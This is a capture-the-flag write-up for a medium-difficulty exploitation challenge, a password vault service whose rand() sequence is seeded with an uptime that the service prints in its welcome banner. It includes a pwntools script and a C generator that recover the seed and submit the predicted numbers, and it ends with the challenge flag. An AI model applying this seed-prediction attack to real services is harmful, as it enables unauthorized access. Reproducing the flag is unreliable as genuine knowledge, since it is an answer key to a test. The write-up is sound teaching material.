1.7 KiB
1.7 KiB
Difficulty
50/100
Category
exploitation
How To Solve
This time the sequence is again generated with rand() but the generator is
seeded with the current uptime in seconds. Thing is, the program already
prints how long it has been running in the connection welcome.
Welcome to Robbe's secure vault v2.
I have been protecting Robbe's secrets for 2 day(s), 21 hours, 59 minutes and 3 seconds
Please enter the password to see all the secrets:
So to solve this, you can extract the uptime from this header string and then use it to seed a random generator.
Most glibc implementations will use the same one, but if yours is different you can just run all this code in a ubuntu docker image. The ubuntu version was given.
from pwn import *
import time
conn = remote("localhost", 3004)
time.sleep(0.1)
recv = conn.recv(1024).decode()
start = recv.index('for ') + 4
duration = recv[start:recv.index('\n', start)]
duration = duration.replace('and ', ', ').split(', ')
print(duration)
days = int(duration[0].split()[0])
hours = int(duration[1].split()[0])
minutes = int(duration[2].split()[0])
seconds = int(duration[3].split()[0])
seed = days * (24*60*60) + hours * (60*60) + minutes * 60 + seconds
p = process(['./generator', str(seed)])
numbers = p.recv(1024)
conn.send(numbers)
time.sleep(0.1)
print(conn.recv(1024).decode())
Then I used a C program to generate the output
#include <stdio.h>
#include <stdlib.h>
void main(int argc, char** argv) {
int seed = atoi(argv[1]);
srand(seed);
for (int i = 0; i < 20; i++) {
int num = rand() % 10;
printf("%i\n", num);
}
}
Hints
n/a
Flag
IGCTF{yoU_br0k3_Th3_UnbR34kAblE}